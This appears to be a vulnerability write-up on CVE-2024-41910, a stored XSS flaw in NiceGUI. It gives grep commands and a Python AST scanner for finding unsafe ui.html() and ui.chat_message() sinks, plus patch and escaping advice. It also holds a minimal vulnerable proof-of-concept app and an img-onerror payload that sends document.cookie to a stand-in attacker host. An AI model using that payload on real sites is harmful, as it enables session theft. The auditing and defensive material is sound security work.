How the CVE Works
CVE-2024-41910 is a Stored Cross-Site Scripting (XSS) vulnerability in NiceGUI, a Python web UI framework built on Vue and FastAPI. The framework-level defect concerns `ui.chat_message()`: the message text was written into the page through the element's `innerHTML`, so any HTML markup contained in the text was parsed by the browser instead of being displayed as text. `ui.html()` is a raw-HTML sink by design rather than a bug, but it becomes the same kind of vector whenever an application hands it untrusted input. When an application takes a value from a source like `ui.input()`, stores it (in a list, a database, or a chat history shared across sessions) and later renders it through either of these sinks, attacker-controlled markup is served to every user who opens the page and executes in their browser under the application's origin: reading cookies that are not marked HttpOnly, issuing authenticated requests as the victim, or rewriting the page content. The root cause is the classic DOM XSS pattern: user-controlled text reaches an `innerHTML`-style sink without HTML escaping.
dailycve form:
Platform: NiceGUI
Version: < 3.0.0
Vulnerability: Stored XSS
Severity: Medium
Date: 2024-08-28
Prediction: Patch available
What Undercode Says:
Searching for vulnerable code patterns with grep
The first command lists ui.html() calls whose content is an f-string or a variable rather than a plain string literal; the second finds ui.chat_message() calls that opt into raw HTML through the text_html flag. On a version affected by this CVE, every ui.chat_message() call that receives user-supplied text is suspect, so drop the second filter when auditing an unpatched install.
grep -rnE "ui\.html\(\s*(f['\"]|[A-Za-z_])" /app/
grep -rn "ui.chat_message" /app/ | grep "text_html=True"
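Grep cannot tell a string literal from a variable or see through parentheses, so the commands above both over- and under-report. The following AST-based scan is an added example (it is neither NiceGUI's code nor the reporter's): it flags ui.html() calls whose content is not a string literal and is not wrapped in html.escape(), and ui.chat_message() calls whose text is non-literal, distinguishing text_html=True (always a raw-HTML sink) from the default (a problem only on versions affected by this CVE). The sample application in SAMPLE_APP is constructed for the example; the assumption that sinks are spelled with the `ui.` prefix and that ui.html()'s keyword parameter is named `content` is mine.

```python
"""AST scan for untrusted data reaching NiceGUI's raw-HTML sinks (added example)."""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Assumption: the application imports NiceGUI as `from nicegui import ui` and calls
# ui.html(...) / ui.chat_message(...) by those names. Content wrapped in html.escape()
# (or a bare escape() imported from html) is treated as safe.
ESCAPE_FUNCS = {"escape"}


@dataclass
class Finding:
    line: int
    sink: str
    reason: str


def _is_ui_call(node: ast.Call, name: str) -> bool:
    """True for a call spelled ui.<name>(...)."""
    f = node.func
    return (isinstance(f, ast.Attribute) and f.attr == name
            and isinstance(f.value, ast.Name) and f.value.id == "ui")


def _is_literal(node: ast.AST) -> bool:
    """A plain string constant is developer-authored markup, not user input."""
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


def _is_escaped(node: ast.AST) -> bool:
    """True if the expression is html.escape(...) or escape(...)."""
    if not isinstance(node, ast.Call):
        return False
    f = node.func
    if isinstance(f, ast.Attribute):
        return f.attr in ESCAPE_FUNCS
    return isinstance(f, ast.Name) and f.id in ESCAPE_FUNCS


def _kwarg(node: ast.Call, name: str) -> ast.AST | None:
    """Value of keyword argument `name`, or None when it is not passed."""
    for kw in node.keywords:
        if kw.arg == name:
            return kw.value
    return None


def audit_source(src: str) -> list[Finding]:
    """Return sink calls whose content/text is neither a literal nor escaped, sorted by line."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        if _is_ui_call(node, "html"):
            # ui.html(content, ...): first positional arg or the `content` keyword (assumed name)
            content = node.args[0] if node.args else _kwarg(node, "content")
            if content is not None and not (_is_literal(content) or _is_escaped(content)):
                findings.append(Finding(node.lineno, "ui.html",
                                        "non-literal content passed to a raw-HTML sink"))
        elif _is_ui_call(node, "chat_message"):
            text = node.args[0] if node.args else _kwarg(node, "text")
            if text is None or _is_literal(text) or _is_escaped(text):
                continue
            flag = _kwarg(node, "text_html")
            if isinstance(flag, ast.Constant) and flag.value is True:
                reason = "text_html=True makes the message a raw-HTML sink"
            else:
                reason = "text is unescaped on NiceGUI versions affected by CVE-2024-41910"
            findings.append(Finding(node.lineno, "ui.chat_message", reason))
    return sorted(findings, key=lambda f: f.line)


# Constructed sample application (not a real code base) mixing safe and unsafe calls.
SAMPLE_APP = """\
from html import escape
from nicegui import ui

messages = []

@ui.page('/')
def index():
    ui.html('<h1>Guest book</h1>')
    for m in messages:
        ui.html(f"<p>{m}</p>")
        ui.html(escape(m))
        ui.chat_message(m, text_html=True)
        ui.chat_message(m, name='guest')
    ui.input('Message', on_change=lambda e: messages.append(e.value))
"""


def report(src: str) -> list[str]:
    """One line per finding, suitable for CI output."""
    return [f"line {f.line}: {f.sink}: {f.reason}" for f in audit_source(src)]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_APP)))
```

Run against SAMPLE_APP the scan reports lines 10, 12 and 13 and stays silent on the literal heading (line 8) and the escaped call (line 11). Treating html.escape() as a safe wrapper is a deliberate allowlist; anything more elaborate (custom sanitizers, Markdown renderers) should be reviewed by hand rather than added to ESCAPE_FUNCS without reading it.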
Proof-of-Concept exploit code
from nicegui import ui

messages = []  # module-level list shared by every session: this is what makes the XSS stored

@ui.page('/')
def exploit():
    for m in messages:
        ui.html(m)  # raw-HTML sink: attacker markup is re-rendered for every visitor
    ui.input('Name', on_change=lambda e: messages.append(e.value))

ui.run()

Payload: <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">
How the Exploit Works:
The attacker submits a payload into a field whose value the application stores and later renders through ui.html() (or through ui.chat_message() on an unpatched version). Because the content reaches the DOM via innerHTML, a bare <script> element is parsed but never executed by the browser; working payloads therefore use event-handler attributes such as <img src=x onerror=...> or <svg onload=...>, which fire as soon as the markup is parsed. The script then runs in the browser of every visitor under the application's origin: it can read cookies that are not marked HttpOnly, send authenticated requests on the victim's behalf, or replace page content for phishing or defacement.
Protection from this CVE
Upgrade NiceGUI to a release that contains the fix (the advisory form above lists 3.0.0 or later; confirm the exact fixed version against the upstream GitHub advisory before relying on the version check alone). Independently of the framework version, render untrusted text with ui.label(), which sets text content rather than HTML. If markup is genuinely required, escape the user-controlled part with html.escape() before building the string passed to `ui.html()`, and never interpolate untrusted text into an f-string handed to `ui.html()`. Do not set text_html=True on ui.chat_message() for user-supplied text. As defence in depth, mark session cookies HttpOnly so that a successful injection cannot exfiltrate them via document.cookie.
Impact:
Session hijacking, phishing attacks, arbitrary client-side action execution, and application compromise for all users viewing the malicious content.
Sources:
Reported By: github.com

